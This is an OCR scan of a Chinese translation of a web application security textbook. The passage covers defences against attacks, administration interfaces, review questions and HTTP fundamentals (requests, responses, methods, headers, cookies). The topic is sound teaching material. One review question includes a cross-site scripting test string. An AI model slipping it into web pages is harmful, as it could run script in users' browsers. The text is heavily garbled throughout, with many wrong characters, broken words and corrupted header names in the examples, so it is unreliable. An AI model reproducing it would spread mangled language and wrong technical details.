确认 机 制 和 其 他 控制 方法 紧密 结合 起 来 。 例 如 ， 如 果 认 为 cookie 中 包含 一 组 特殊 值 中 的 某 个 值 ， 
那么 任何 违反 这 种 情况 的 现象 即 表 明 该 值 已 被 修改 ， 而 且 应 用 程序 的 普通 用 户 无 法 执行 此 类 修 
改 。 同 样 ， 如 末 一 名 用 户 修 改 隐藏 表单 子 段 中 的 账号 ， 以 确定 为 一 名 用 户 的 账户 ， 这 种 做 法 也 明 
确 表现 出 恶意 意图 。 应 用 程序 的 主要 防御 机 制 应 阻止 这 些 攻击 ， 而 且 ,， 这 些 保护 机 制 可 轻易 与 应 
用 程序 的 警报 机 制 进行 整合 ,提供 完全 目 定 义 的 亚 意 行为 警示 。 因 为 已 经 根据 应 用 程序 的 实际 逻 
辑 定制 这 些 检查 ,如 果 清 楷 了 解 普 通用 户 的 操作 权限 , 那么 不 管 任何 现 有 的 解决 方案 多 么 易于 配 
置 ， 与 之 相 比 ， 它 们 都 能 提供 更 加 准确 的 警报 。 


2.3.4 应 对 攻击 


除 回 管理 员 发 出 警报 外 , 许多 安全 性 至 关 重 要 的 应 用 程序 还 含有 内 置 机 制 ， 以 防御 淤 在 恶意 
用 户 。 

由 于 应 用 程序 各 不 相同 , 现实 世界 中 的 许多 攻击 要 求 攻 击 者 系统 地 探查 应 用 程序 中 存在 的 源 
洞 , 提交 无 数 包含 专门 设计 的 输入 请 求 ， 以 确定 其 中 是 否 存 在 各 种 第 见 的 漏洞 。 局 效 的 输入 确认 
机 制 能 够 把 许多 这 种 类 型 的 请 求 确 定 为 六 在 的 恶意 请 求 , 并 阻止 这 些 输入 , 防止 它们 给 应 用 程序 
造成 任何 不 利 影响 。 然 而 ， 我 们 还 应 意识 到 ， 攻 击 者 仍然 能 够 以 条 种 方式 避 开 这 些 过 滤 ; 而 且 ， 
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应 用 程序 确实 包含 某 些 实际 的 漏洞 ， 等 竺 攻击 者 去 发 现 和 利用 。 从 茶 种 意义 上 说 ,进行 系统 性 探 
碍 的 攻击 者 可 能 会 发 现 这 些 缺 陷 。 

有 鉴于 此 , 一 些 应 用 程序 采取 目 动 反应 措施 阻止 攻击 者 进行 这 种 形式 的 探查 , 例如 对 攻击 者 
提交 的 请 求 的 啊 应 速度 变 得 越 来 越 慢 , 或 者 终止 攻击 者 的 会 话 , 要 求 其 重新 登录 或 在 继续 攻击 前 
执行 其 他 步 又 。 虽然 这 些 措 施 无 法 阻挡 最 有 耐心 和 决心 的 攻击 者 , 但 能 够 阻止 许多 很 随意 的 攻击 
者 ， 并 且 为 管理 员 监 控 此 类 情况 、 在 必要 时 采取 更 加 严 历 的 措施 局 得 时 间 。 

当然 ,阻止 显而易见 的 攻击 并 不 如 修复 应 用 程序 中 存在 的 所 有 漏洞 重要 。 然 而 ,在 现实 情况 
中 , 即使 我 们 为 清除 应 用 程序 中 的 安全 缺陷 做 出 了 不 懈 努 力 , 仍然 会 有 一 些 可 供 利 用 的 缺陷 存在 。 
给 攻击 者 设置 更 多 阻碍 是 一 种 有 效 的 深层 防御 措施 , 这 样 做 能 够 降低 任何 残存 的 漏洞 被 发 现 和 利 
用 的 可 能 性 。 


2.4 管理 应 用 程序 


任何 有 用 的 应 用 程序 都 需要 进行 管理 与 维护 , 这 种 功能 通 篆 是 应 用 程序 安全 机 制 的 一 个 重要 
组 成 部 分 , 可 帮助 管理 员 管 理 用 户 账户 与 角色 、 应 用 监控 与 审计 功能 、 执 行 诊断 任务 并 配置 应 用 
程序 的 各 种 功能 。 

许多 应 用 程序 一 般 通 过 相同 的 Web 界 面 在 内 部 执行 管理 功能 ， 这 也 是 它 的 核心 非 安 全 功能 ， 
如 图 2-8 所 示 。 在 这 种 情况 下 ， 管 理 机 制 束 成 为 应 用 程序 的 主要 受 攻击 面 。 它 吸引 攻击 者 的 地 方 
主要 在 于 它 能 够 提升 权限 ， 以 下 举例 说 明 。 
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图 2-8 ”Web 应 用 程序 中 的 管理 界面 
口 身份 验证 机 制 中 存在 的 薄弱 环节 使 攻击 者 能 够 获得 管理 员 权 限 ， 迅 速 攻破 整个 应 用 程序 。 





口 许多 应 用 程序 并 不 对 它 的 一 些 管理 功能 执行 有 效 的 访问 控制 。 利 用 这 个 涯 洞 ， 攻 击 者 可 
以 建立 一 个 拥有 强大 特权 的 新 用 户 账 户 。 
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口 管理 功能 通 稼 能 够 显示 普通 用 户 提交 的 数据 。 管 理 界 面 中 存在 的 任何 器 站 点 脚本 缺陷 宛 
可 能 危及 用 户 会 话 的 安全 。 

口 因为 管理 用 户 被 视 为 可 信用 户 ， 或 者 由 于 渗透 测试 员 只 能 访问 低 权 限 的 账户 ， 所 以 管理 
功能 往往 没有 经 过 严格 的 安全 测试 。 而 且 ， 它 通 篆 需要 执行 相当 人 危险 的 操作 ， 包 括 访问 
磁盘 上 的 文件 或 操作 系统 命令 。 如 果 一 名 攻击 者 能 够 攻破 管理 功能 ， 就 能 利用 它 控制 整 
个 服务 褒 。 














2.5 小结 


* 管 存在 巨大 差异 , 但 几乎 所 有 的 Web 应 用 程序 都 以 某 种 形式 采用 相同 的 核心 安全 机 制 。 这 
些 机 制 是 应 用 程序 应 对 恶意 用 户 所 采取 的 主要 防御 措施 , 因而 应 用 程序 的 受 攻击 面 大 部 分 也 由 它 
们 构成 。 我 们 在 本 书后 面 介绍 的 独 洞 也 主要 源 于 这 些 核 心机 制 中 存在 的 缺陷 。 

在 这 些 机 制 中 , 处 理 用 户 访问 和 用 户 输入 的 机 制 是 最 重要 的 机 制 。 当 针对 应 用 程序 发 动 攻击 
时 ,它们 将 成 为 主要 攻击 对 象 。 利用 这 些 机 制 中 存在 的 缺陷 通常 可 以 完全 攻破 整个 应 用 程序 , 使 
攻击 者 能 够 访问 其 他 用 户 的 数据 、 执 行 未 授权 操作 以 及 注入 任意 代码 和 命令 。 























2.6 问题 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh"。 
(1) 为 什么 说 应 用 程序 处 理 用 户 访问 的 机 制 是 所 有 机 制 中 最 溥 弱 的 机 制 ? 
(2) 会 话 与 会 话 令 牌 有 何不 同 ? 
(3) 为 何不 可 能 始终 使 用 基于 白 名 单 的 方法 进行 输入 确认 ? 
(4) 攻击 者 正在 攻击 一 个 执行 管理 功能 的 应 用 程序 ， 并 且 不 具有 使 用 这 项 功能 的 任何 有 效 证 
书 。 为 何 他 仍然 应 当 密 切 关 注 这 项 功能 呢 ? 
(5) 旨 在 阻止 路 站 点 脚本 攻击 的 输入 确认 机 制 按 以 下 顺序 处 理 一 个 输入 : 
(a) 删除 任何 出 现 的 <script> 表 达 式 ; 
(b) 将 输入 截 短 为 50 个 字符 ; 
(c) 删除 输入 中 的 引号 
(d) 对 输入 进行 URL 解 码 ; 
(e) 如 末 任 何 输入 项 被 删除 ， 返 回 步 又 (])。 
是 否 能 够 避 开 上 述 确认 机 制 ， 让 以 下 数据 通过 确认 ? 


"><script>alert ("foo")</script> 

















Q 答案 的 中 文 版 请 参阅 图 灵 社 区 本 书页 面 ( http://www.ituring.com.cn/book/885 )， 或 http://blog.sina.com.cn/s/ 
blog 545eb7860101379s.html。 一 一 译 者 注 
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eb 应 用 程序 使 用 各 种 不 同 的 技术 实现 其 功能 。 本 章 简 要 介绍 渗透 测试 员 在 攻击 Web 应 
用 程序 时 可 能 遇 到 的 关键 技术 。 我 们 将 分 析 HTTP 协 议 、 服 务 器 和 客户 问 消 用 的 技术 以 
及 用 于 在 各 种 情形 下 呈现 数据 的 编码 方案 。 这 些 技术 大 都 简单 易 刷 ， 告 握 其 相关 特性 对 于 问 Web 
应 用 程序 发 动 有 效 攻 击 极其 重要 。 
如 有 果 读 者 已 经 熟悉 Web 应 用 程序 所 使 用 的 关键 技术 ， 可 以 快速 浏览 本 前 内 容 ,， 确定 其 中 没有 
不 了 解 的 技术 。 如 果 还 在 学 习 Web 应 用 程序 的 工作 原理 ,那么 在 继续 阅读 分 析 特 殊 漏 洞 的 后 续 草 
让 前 , 应 当先 阅读 本 前 内 容 。 为 了 进一步 学 习 本 书后 续 半 市 涉及 的 内 容 , 我 们 推荐 谈 者 阅读 David 
Gourley 和 Brian Totty 合 车 的 HTTP: The Definitive Guide 一 书 ( OReilly，2002 )， 也 可 在 万 维 网 联 
盟 网 站 (www.w3.02g ) 上 阅读 电子 版 。 


3.1 HTITP 


HTTP (HyperText Transfer Protocol， 超 文本 传输 协议 ) 是 访问 万 维 网 使 用 的 核心 通信 协议 ， 
也 是 今天 所 有 Web 应 用 程序 使 用 的 通信 协议 。 最 初 ，HTTP 只 是 一 个 为 获取 基于 文本 的 静态 资源 
而 开发 的 简单 协议 ,后 来 人 们 以 各 种 形式 扩展 和 利用 它 , 使 其 能 够 文 持 如 今 稼 见 的 复杂 分 布 式 应 
用 程序 。 

HTTP 使 用 一 种 基于 消息 的 模型 .客户 端 送出 一 条 请 求 消息 ， 而 后 由 服务 器 返回 一 条 响应 消 
息 。 该 协议 基本 上 不 需要 连接 ， 虽然 HTTP 使 用 有 状态 的 TCP 协 议 作 为 它 的 传输 机 制 ， 但 每 次 请 
求 与 啊 应 交换 都 自动 完成 ， 并 且 可 能 使 用 不 同 的 TCP 连 接 。 
































3.1.1 HTTP 请 求 


所 有 HTTP 消 息 (请求 与 啊 应 ) 中 都 包含 一 个 或 几 个 单行 显示 的 消息 涉 ( header )， 然 后 是 一 
个 强制 空白 行 ， 最 后 是 消息 主体 (可 选 )。 以 下 是 一 个 典型 的 HTTP 请 求 : 
GET /auth/488/YourDetails.ashx?uid=129 HTTP/1.1 


Accept: application/x-ms-application, image/Jpeg, application/xaml+xml, 





image/git, image/pjpeg, application/x-ms-xbap, application/x-shockwave- 
flash, */* 

Referer: https://mdsec.net/auth/4838/Home.ashx 

Accept-Language: en-GB 





28 


3.1 


第 3 章 Web 应 用 程序 技术 


User-Agent: Mozil]la/4.0 {compatible; MSIE 8.0; Windows NT 6.1; WOW64; 
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; .NET4.0C; InfoPpath.3; .NET4.0FE; FDM; .NET CLR 1.1.4322) 
ACCEpt-Encoding: gzip, deflate 

Host: mdsec.net 

Connection: Keep-Alive 

Cookie: SessionId=5B70C71F3FD4968935CDB6682E545476 


每 个 HTTP 请 求 的 第 一 行 都 由 3 个 以 空格 间隔 的 项 目 组 成 。 

口 一 个 说 明 HTTP 方 法 的 动词 。 最 稼 用 的 方法 为 GegT， 它 的 主要 作用 是 从 Web 服 务 天 获取 一 
个 资源 。GET 请 求 并 没有 消息 主体 ， 因 此 在 消息 头 后 的 空白 行 中 没有 其 他 数据 。 

口 所 请 求 的 URL。 该 URL 通 和 由 所 请 求 的 资源 名 称 ， 以 及 一 个 包含 客户 端 癌 该 资源 提交 的 
参数 的 可 选 查询 字符 串 组 成 。 在 该 URL 中 ， 查 询 字 符 串 以 ?字符 标识 ， 上 面 的 示例 中 有 一 
个 名 为 uida、 值 为 129 的 参数 。 

口 使 用 的 HITTP 版 本 。 因 特 网 上 篆 用 的 HTTP 版 本 为 1.0 和 1.1， 多 数 浏览 希 默 认 使 用 1.1 厂 本 。 
这 两 个 版 本 的 规范 之 间 存 在 一 些 差异 ; 然而 ， 当 攻击 Web 应 用 程序 时 ,渗透 测试 员 可 能 遇 
到 的 唯一 差异 是 1.1 版 本 必须 使 用 Host 请 求 头 。 

请 求 示 例 中 的 其 他 一 些 要 点 如 下 。 

口 Referer 消 息 头 用 于 表示 发 出 请 求 的 原始 URL (例如 ， 因 为 用 户 单 击 页 面 上 的 一 个 链 
接 )。 请 注意 , 在 最 初 的 HTTP 规 范 中 , 这 个 消息 头 存在 拼写 错误 ,并且 这 个 错误 一 直 保 
留 了 下 来 。 

D User-Agent 消 息 涉 提供 与 浏览 幕 或 其 他 生成 请 求 的 客户 端 软件 有 关 的 信息 。 请 注意 ,由 
于 历史 原因 ， 大 多 数 浏 览 疮 中 都 包含 Mozilla 前 绥 。 这 是 因为 最 初 占 支配 地 位 的 Netscape 
浏览 锅 使 用 了 User-aAgent 字 符 串 ， 而 其 他 浏览 锅 也 和 希望 计 Web 站 点 相信 它们 与 这 种 标准 
兼容 。 与 计算 领域 历史 上 的 许多 怪异 现象 一 样 ， 这 种 现象 变 得 很 普 帝 ， 即 使 当前 版 本 的 
Internet Explorer 也 保留 了 这 一 做 法 ， 示 例 的 请 求 即 由 Internet Explorer 提 出 。 

口 Host 消 息 头 用 于 指定 出 现在 被 访问 的 完整 URL 中 的 主机 名 称 。 如 果 几 个 Web 站 点 以 相同 
的 一 人 台 服 务 天 为 主机 ， 束 震 要 使 用 Host 消 息 头 ， 因 为 请 求 第 一 行 中 的 URL 内 通 稍 并 不 包 
含 主 机 名 称 〈 请 参阅 第 17 音 了解 更 多 与 虚拟 主机 Web 站 点 有 关 的 信息 )。 

D cookie 消息 头 用 于 提交 服务 硕 加 客户 端 发 布 的 其 他 参数 〈 请 参阅 本 章 后 续 内 容 了 解 更 


多 详情 )。 



















































































.2 HTTP 响 应 


以 下 是 一 个 典型 的 HTTP 啊 应 : 

HTTPF/1.1 200 OF 

Date: Tue, 19 Apr 2011 09:23:32 GMT 

Server: Microsoft-IIS/6.0 

X-Powered-By: ASP.NET 

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSwc 
KX-ASpNet-Version: 2.0.50727 
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Cache-Control: no-cache 

Pragma: no-cache 

Expires: Thu, O01 Jan 1970 00:00:00 GMT 
Content-Type: text/html; charset=utf-8 
Content-Length: 1067 


<IDOCTYPE html PUBLIC "-//W3C/ /DTD XHTML 1.0 Transitional//EN" "http:// 
WWW.W3 .0rg/TR/xhtml1l/DTD/xhtmll-transitional.dtd"><ntml xmlns="http:// 
WwW.w3 .0o0rg/1999/xhtml" ><head><title>Your details</title> 








每 个 HTTP 啊 应 的 第 一 行 由 3 个 以 空格 间隔 的 项 目 组 成 。 














口 使 用 的 HTTP 版 本 。 
口 表示 请 求 结 果 的 数字 状态 码 。200 是 最 常用 的 状态 码 ， 它 表示 成 功 提 交 了 请 求 ， 正 在 返回 
所 请 求 的 资源 。 








口 一 段 文本 形式 的 “原因 短语 ”， 进 一 步 说 明 啊 应 状态 。 这 个 短语 中 可 包含 任何 值 ， 当 前 浏 
览 硕 不 将 其 用 于 任何 目的 。 

啊 应 示例 中 的 其 他 一 些 要 点 如 下 。 

口 servez 消 息 头 中 包含 一 个 旗 标 ， 指 明 所 使 用 的 Web 服 务 硕 软件 。 有 时 还 包括 其 他 信息 ， 
如 所 安 疼 的 模块 和 服务 大 操作 系统 。 其 中 包含 的 信息 可 能 并 不 准确 。 

口 Set-cookie 消 息 头 回 浏 览 锅 发 送 另 一 个 cookie， 它 将 在 随后 向 服务 器 发 送 的 请 求 中 由 
cookie 消 息 头 返回 。 

口 pragma 消息 头 指 示 浏 览 硕 不 要 将 啊 应 保存 在 缓存 中 。Bxpires 消 息 头 指出 啊 应 内 容 已 经 
过 期 ， 因 此 不 应 保存 在 缓存 中 。 当 返回 动态 内 容 时 常常 会 发 送 这 些 指 令 ， 以 确保 浏览 3 
随时 获得 最 新 内 容 。 

口 几乎 所 有 的 HTTP 啊 应 在 消息 头 后 的 空白 行 下 面 都 包含 消息 主体 ，content-Type 消 息 头 
表示 这 个 消息 主体 中 包含 一 个 HTML 文档。 

口 content-Length 消 息 头 规定 消息 主体 的 字 节 长 度 。 














3.1.3 HTTP 方法 


当 渗 透 测 试 员 攻击 Web 应 用 程序 时 ， 几 乎 肯定 会 遇 到 最 常用 的 方法 : Gamr 和 PosT。 这 些 方法 
之 间 存 在 一 些 必须 了 解 的 重要 差异 ， 忽 略 这 些 差异 可 能 会 危及 应 用 程序 的 安全 。 

ca 方法 的 作用 在 于 获取 资源 . 它 可 以 用 于 URL 查 询 字符 串 的 形式 向 所 请 求 的 资源 发 送 参 数 。 
这 使 用 户 可 将 一 个 包含 动态 资源 的 URL 标 注 为 书签 , 用 户 自己 或 其 他 用 户 随后 可 重复 利用 该 书签 
来 获取 等 价 的 资源 (作用 与 标注 为 书签 的 搜索 查询 相似 )，URL 显 示 在 屏幕 上 ， 并 被 记录 在 许多 
地 方 ， 如 浏览 器 的 历史 记录 和 Web 服 务 器 的 访问 日 志 中 。 如 果 单 击 外 部 链接 ， 还 可 以 用 Referex 
消息 头 将 它们 传送 到 其 他 站 点 。 因 此 ， 请 勿 使 用 查询 字符 串 传送 任何 敏感 信息 。 

posT 方 法 的 主要 作用 是 执行 操作 。 使 用 这 个 方法 可 以 在 URL 查 询 字符 串 与 消息 主体 中 发 送 
请 求 参数 。 尽 管 仍然 可 以 将 URL 标 注 为 书签 ,但 书签 中 并 不 包含 消息 主体 发 送 的 任何 参数 。 许 多 
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维护 URL 日 志 的 位 置 及 Referer 消 息 头 也 将 这 些 参 数 排除 在 外 。 因 为 Posr 方 法 则 在 执行 操作 ， 
如 果 用 户 单 击 浏览 器 上 的 “后 退 ” 按 钮 ， 返 回 一 个 使 用 这 种 方法 访问 的 页 面 ， 那 么 浏览 器 不 会 自 
动 重新 发 送 请 求 ， 而 是 就 即将 发 生 的 操作 向 用 户 发 出 警告 ， 如 图 3-1 所 示 。 这 样 做 可 防止 用 户 无 
意 中 多 次 执行 同一 个 操作 。 因 此 ， 在 执行 某 一 操作 时 必须 使 用 posT 请 求 。 


Confim 攻 到 

















To display this page, Firefox must send information that will repeat any action (such as a search or 
order confirmation) that was performed earlier, 


[ Resend ] | Cancel | 














图 3-1 浏览 融 不 会 目 动 重新 发 送 用 户 提出 的 PosT 请 求 ， 因 为 这 样 做 会 导致 
多 次 执行 朱 一 操作 


除了 GET 和 POST 方 法 以 外 ，HTTP 协 议 还 支持 许多 其 他 因 特 殊 日 的 而 建立 的 方法 。 需 要 了 解 
的 其 他 方法 如 下 。 
口 HEAD。 这 个 方法 的 功能 与 GET 方 法 相似 ， 不 同 之 处 在 于 服务 右 不 会 在 其 响应 中 返回 消息 
主体 。 服 务 需 返回 的 消息 头 应 与 对 应 GET 请 求 返 回 的 消息 头 相 同 。 因 此 ， 这 种 方法 可 用 于 
仿 查 某 一 资源 在 向 其 提交 GT 请 求 前 是 否 存 在 。 
口 TRACE 。 这 种 方法 主要 用 于 诊断 。 服 务 圳 应 在 响应 主体 中 返回 其 收 到 的 请 求 消息 的 具体 内 
容 。 这 种 方法 可 用 于 检测 客户 端 与 服务 絮 之 间 是 否 存 在 任何 操纵 请 求 的 代理 服务 姨 。 
口 oPTIONS。 这 种 方法 要 求 服务 器 报告 对 某 一 特殊 资源 有 效 的 HTTP 方 法 。 服 务 器 通常 返回 
一 个 包含 Al1low 消 息 头 的 响应 ， 并 在 其 中 列 出 所 有 有 效 的 方法 。 
口 PuT。 这 个 方法 试图 使 用 包含 在 请 求 主体 中 的 内 容 ， 向 服务 厦 上 传 指定 的 资源 。 如 果 激 活 
这 个 方法 ， 渗 透 测 试 员 就 可 以 利用 它 来 攻击 应 用 程序 。 例 如 ， 通 过 上 传 任意 一 段 脚本 并 
在 服务 器 上 执行 该 脚本 来 攻击 应 用 程序 。 
还 有 许多 其 他 与 攻击 Web 应 用 程序 没有 直接 关系 的 HTTP 方 法 。 然 而 ， 如 果 激 活 某 些 危险 的 
方法 ，Web 服 务 器 可 能 面临 攻击 风险 。 请 参阅 第 18 章 了 解 更 多 关于 这 些 方法 的 详情 ， 以 及 在 攻击 
中 使 用 它们 的 示例 。 









































3.1.4 URL 
URL ( Uniform Resource Locator， 统 一 资源 定位 符 ) 是 标识 Web 任 源 的 唯一 标识 符 ， 通 过 它 
即 可 获取 其 标识 的 资源 。 最 常用 的 URL 格 式 如 下 : 
Dratocol:/7hostname [geee lpath/ lftilel?param value. 
这 个 结构 中 有 几 个 部 分 是 可 选 的 。 如 果 端 口号 与 相关 协议 使 用 的 默认 值 不 同 , 则 只 包含 端口 号 即 
可 。 用 于 生成 前 面 的 HTTP 请 求 的 URLI 为 : 
https://mdsec.net/auth/488/YourDetails.ashx?uid=129 


除 这 种 绝对 形式 外 ， 还 可 以 相对 菏 一 特殊 主机 或 主机 上 的 一 个 特殊 路 径 指定 URL， 例 如 : 
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/auth/488/YourDetails.ashx?uid=129 
YourDetails.ashx?uid=129 


Web 页 面 常 常 使 用 这 些 相 对 形式 描述 Web 站 点 或 应 用 程序 中 的 导航 。 











注解 ”URL 的 正确 技术 术语 实际 为 URI ( Uniform Resource Identifier， 统 一 资源 标识 





符 )， 但 这 一 术语 仅 用 于 正式 规范 中 ， 或 者 被 那些 布 望 炫 雁 学 识 的 人 所 使 用 。 


3.1.5 REST 


表述 性 状态 转移 ( REST ) 是 分 布 式 系统 的 一 种 体系 架构 ， 在 这 类 体系 架构 中 ， 请 求 和 啊 应 
包含 系统 资源 当前 状态 的 表述 。 万 维 网 ， 包 括 HTTP 协 议和 URL 格 式 中 使 用 的 核心 技术 ， 均 符合 
REST 体 系 染 构 风格 。 

虽然 在 查询 字符 串 中 包含 参数 的 URL 本 里 遵循 REST 约 束 , 但 “REST 风 格 的 URL” 一 词 通常 
指 在 URL 文 件 路 人 径 而 非 查 询 字 符 串 中 包含 参数 的 URL。 例 如 ， 下 面 这 个 包含 查询 字符 串 的 URL: 

http://wahh-app.com/search?make=fords&model=pinte 
与 以 下 包含 “REST 风 格 ” 参 数 的 URL 相 对 应 : 

http://wahh-app.com/search/ford/pintc 

在 第 4 音 中 ， 我 们 将 讨论 如 何在 解析 应 用 程序 的 内 容 和 功能 、 以 及 确定 其 受 攻击 面 时 处 理 这 
些 不 同 风格 的 参数 。 














3.1.6 ”HTTP 消息 头 


HTTP 文 持 许多 不 同 的 消息 头 ,， 其 中 一 些 专用 于 特殊 用 途 。 一些 消息 头 可 用 在 请 求 与 啊 应 中 ， 
而 其 他 一 些 消 肯 头 只 能 专门 用 在 某 个 特定 的 消 肯 中 。 下 面 列 出 渗透 测试 员 在 攻击 Web 应 用 程序 时 
可 能 遇 到 的 消息 头 。 
1. 常用 消息 头 
口 connection。 这 个 消息 头 用 于 告诉 通信 的 另 一 端 ， 在 完成 HTTP 传 输 后 是 关闭 TCP 连 接 ， 
还 是 保持 连接 开放 以 接收 其 他 消息 。 
DD Content-Encodingo 这 个 消息 头 为 消息 主体 中 的 内 容 指定 编码 形式 ( 如 gzip )， 一 些 应 
用 程序 使 用 它 来 压缩 啊 应 以 加 快 传输 速度 。 
DD Content-Length。 这 个 消息 头 用 于 规定 消息 主体 的 字 节 长 度 。 (HEAD 语 法 的 啊 应 例外 ， 
它 在 对 应 的 cET 请 求 的 响应 中 指出 主体 的 长 度 。) 
DD Content-Typeo 这 个 消息 头 用 于 规定 消息 主体 的 内 容 类 型 。 例 如 ，HTML 文 档 的 内 容 类 
型 为 Lext /html。 
DD Transfer-Encodingo 这 个 消息 头 指 定 为 方便 其 通过 HTTP 传 输 而 对 消息 主体 使 用 的 任 
何 编码 。 如 末 使 用 这 个 消 轧 头 ， 通 常用 它 指 定 块 编码 。 
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2. 请 求 消息 头 

口 Accept。 这 个 消息 头 用 于 告诉 服务 本 客户 端 愿 意 接受 哪些 内 容 ， 如 图 像 类 型 、 办 公文 档 
格式 等 。 

DD Accept-Encodingo 这 个 消息 头 用 于 告诉 服务 硕 ， 客户 并 愿意 接受 哪些 内 容 编 码 。 

口 Authorization。 这 个 消息 头 用 于 为 一 种 内 置 HTTP 吴 份 验证 癌 服 务 硕 提交 证 书 。 

D cookie。 这 个 消息 头 用 于 辐 服 务 硕 提交 它 以 前 发 布 的 cookie。 

D Host。 这 个 消息 头 用 于 指定 出 现在 所 请 求 的 完整 URL 中 的 主机 名 称 。 

口 If-Modified-Ssince。 这 个 消息 头 用 于 说 明 浏 览 融 最 后 一 次 收 到 所 请 求 的 资源 的 时 间 。 
如 采 目 那 以 后 资源 没有 发 生变 化 ， 服 务 需 就 会 发 出 一 个 市 状态 码 304 的 啊 应 ， 指 示 客 户 端 
使 用 资源 的 缓存 副本 。 

D If-None-Match。 这 个 消息 头 用 于 指定 一 个 实体 标签 。 实 体 标 签 是 一 个 说 明 消 息 主体 内 
容 的 标识 符 。 当 最 后 一 次 收 到 所 请 求 的 资源 时 ， 浏 览 姨 提交 服务 姨 发 布 的 实体 标签 。 服 
务 需 可 以 使 用 实体 标签 确定 浏览 需 是 否 使 用 资源 的 缓存 副本 。 

D origin。 这 个 消息 头 用 在 路 域 Ajax 请 求 中 ， 用 于 指示 提出 请 求 的 域 〈 请 参阅 第 13 音 了 解 
相关 内 容 )。 

口 Referer。 这 个 消息 头 用 于 指示 提出 当前 请 求 的 原始 URL。 

D User-aAgent。 这 个 消息 头 提供 与 浏览 句 或 生成 请 求 的 其 他 客户 端 软件 有 关 的 信息 。 

3. 响应 消息 头 

口 access-control-Allow-origin。 这 个 消息 头 用 于 指示 可 否 通过 路 域 Ajax 请 求 获 取 
资源 。 

口 cache-conttrol。 这 个 消息 头 用 于 回 浏 览 硕 传送 缓存 指令 【如 no-cache )。 

D Erag。 这 个 消息 头 用 于 指定 一 个 实体 标签 。 客 户 端 可 在 将 来 的 请 求 中 提交 这 个 标识 符 ， 
获得 和 If-None-Match 消 奶头 中 相同 的 资源 ， 通 知 服务 帮 浏 览 瘟 当前 绥 存 中 保存 的 是 哪 
个 版 本 的 资源 。 

口 Expires。 这 个 消息 涉 用 于 辣 浏 览 右 说 明 消 息 主 体内 容 的 有 效 时 间 。 在 这 个 时 间 之 前 ， 
浏览 硕 可 以 使 用 这 个 资源 的 绥 存 副本 。 

D Location。 这 个 消息 头 用 于 在 重 定 回 啊 应 〈 那 些 状 态 码 以 3 开头 的 啊 应 ) 中 说 明 重 定 问 
的 目标 。 

口 pragma。 这 个 消息 头 用 于 同 浏 览 硕 传送 缓存 指 令 (如 no-cache )。 

D Server。 这 个 消息 头 提 供 所 使 用 的 Web 服 务 天 软件 的 相关 信息 。 

口 set-Cookie。 这 个 消息 涉 用 于 癌 浏览 右 发 布 cookie， 浏 览 器 会 在 随后 的 请 求 中 将 其 返回 
给 服务 大 。 

口 wwWW-Authenticate。 这 个 消息 头 用 在 之 401 状 态 码 的 啊 应 中 ， 提 供与 服务 磊 所 支持 的 号 
份 验证 类 型 有 关 的 信息 。 

口 Xx-Frame-Options。 这 个 消息 头 指 示 浏 览 絮 框架 是 否 及 如 何 加 载 当 前 啊 应 (请 参阅 第 13 
草 了 解 相 关内 容 )。 
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3.1.7 cookie 


cookie 是 大 多 数 Web 应 用 程序 所 依赖 的 HTTP 协 议 的 一 个 关键 组 成 部 分 , 攻击 者 向 向 通过 它 来 
利用 Web 应 用 程序 中 的 漏洞 。 服 务 套 使 用 cookie 机 制 回 客户 端 发 送 数 据 , 客户 问 保 存 cookie 并 将 其 
返回 给 服务 右 。 与 其 他 类 型 的 请 求 参 数 ( 存在 于 URL 查 询 字 符 串 或 消息 主体 中 ) 不 同 ， 无 须 应 用 
程序 或 用 户 采 取 任 何 特殊 措施 ， 随 后 的 每 一 个 请 求 都 会 继续 重新 问 服 务 右 提交 cookie。 

如 前 所 述 ， 服 务 需 使 用 set-cookie 啊 应 消息 头发 布 cookie: 

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWe 
然后 ， 用 户 的 浏 览 硕 目 动 将 下 面 的 消息 头 添 加 到 随后 返回 给 同一 服务 硕 的 请 求 中 : 

Cookie: tracking=tI8rk7joMx44S2Uu85nSWc 

如 上 所 示 ，cookie 一 般 由 一 个 名 / 值 对 构成 , 但 也 可 包含 任何 不 含 空 格 的 字符 串 。 可 以 在 服务 
需 响 应 中 使 用 几 个 set-cookie 消 息 头 发 布 多 个 cookie, 并 可 在 同一 个 cookie 消 息 头 中 用 分 号 分 
隔 不 同 的 cookie， 将 它们 全 部 返回 给 服务 需 。 

除 cookie 的 实际 值 外 ，Sset-cCookie 消 奶头 还 可 包含 以 下 任何 可 选 属性 ， 用 它们 控制 浏览 兹 
处 理 cookie 的 方式 。 

口 expires。 用 于 设 定 cookie 的 有 效 时 间 。 这 样 会 使 浏览 锅 将 cookie 保 存在 永久 性 的 存储 需 

中 ， 在 随后 的 训 览 融会 话 中 重复 利用 ， 直 到 到 期 时 间 为 止 。 如 果 没 有 设 定 这 个 属性 ， 那 
么 cookie 仅 用 在 当前 浏览 硕 会 话 中 。 

口 gomain。 用 于 指定 cookie 的 有 效 域 。 这 个 域 必 须 和 收 到 cookie 的 域 相同 , 或 者 是 它 的 父 域 。 

口 path。 用 于 指定 cookie 的 有 效 UREL 路 径 。 

D secure。 如 果 设 置 这 个 属性 ， 则 仪 在 HTTPS 请 求 中 提交 cookie。 

口 Httponly。 如 果 设 置 这 个 属性 ， 将 无 法 通过 客户 端 J avaScript 卫 接 访 问 cookie。 

上 上 述 每 一 个 cookie 属 性 都 可 能 影响 应 用 程序 的 安全 ， 其 造成 的 主要 不 利 影响 在 于 攻击 者 能 够 
直接 对 应 用 程序 的 其 他 用 户 发 动 攻 击 。 请 参阅 第 12 草 和 第 13 章 了 解 更 多 详情 。 
























































3.1.8 状态 码 


每 条 HTTP 啊 应 消息 都 必须 在 第 一 行 中 包含 一 个 状态 码 ， 说 明 请 求 的 结果 。 根 据 代 码 的 第 一 
位 数字 ， 可 将 状态 码 分 为 以 下 5 类 ，。 

口 1xx 一 一 提供 信息 。 

口 2xx 一 一 请 求 被 成 功 提交 。 

口 3xx 一 一 客户 问 被 重 定 问 到 其 他 资源 。 

口 4xx 一 一 请求 包含 某 种 错误 。 

口 5xx 一 一 服务 大 执行 请 求 时 遇 到 错误 。 

还 有 大 量 特 殊 状 态 码 ， 其 中 许多 状态 人 码 仪 用 在 特殊 情况 下 。 下 面 列 出 渗透 测试 员 在 攻击 Web 
